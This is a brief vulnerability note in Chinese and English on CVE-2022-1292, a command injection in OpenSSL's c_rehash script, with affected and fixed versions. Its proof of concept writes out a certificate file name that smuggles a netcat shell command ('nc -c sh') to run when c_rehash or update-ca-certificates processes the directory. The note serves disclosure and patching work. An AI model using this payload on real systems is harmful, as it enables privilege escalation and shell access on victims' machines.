Skip to content

CVE 2022 1292

说明

c_rehash 脚本未正确清理 shell metacharacters(源字符) 以防止命令注入。 此脚本由某些操作系统以自动执行的方式分发。 在这样的操作系统上,攻击者可以使用脚本的权限执行任意命令。 使用 c_rehash 脚本被认为是过时的,应该由 OpenSSL rehash 命令行工具代替。

POC

![[Pasted image 20221013172057.png]]

  1. Navigate to /etc/ssl/certs/ (defalut) or other paths configured in update-ca-certificates
  2. echo "-----BEGIN CERTIFICATE------" > "hey.crt\'nc -c sh 127.0.0.1 12345\'" (nc as payload example)
  3. Then wait until execution of update-ca-certificates. You can trigger it manually with c_rehash .

影响范围 - Fixed in OpenSSL 3.0.3 (git commit) (Affected 3.0.0,3.0.1,3.0.2) - Fixed in OpenSSL 1.1.1o (git commit) (Affected 1.1.1-1.1.1n) - Fixed in OpenSSL 1.0.2ze (premium support) (Affected 1.0.2-1.0.2zd)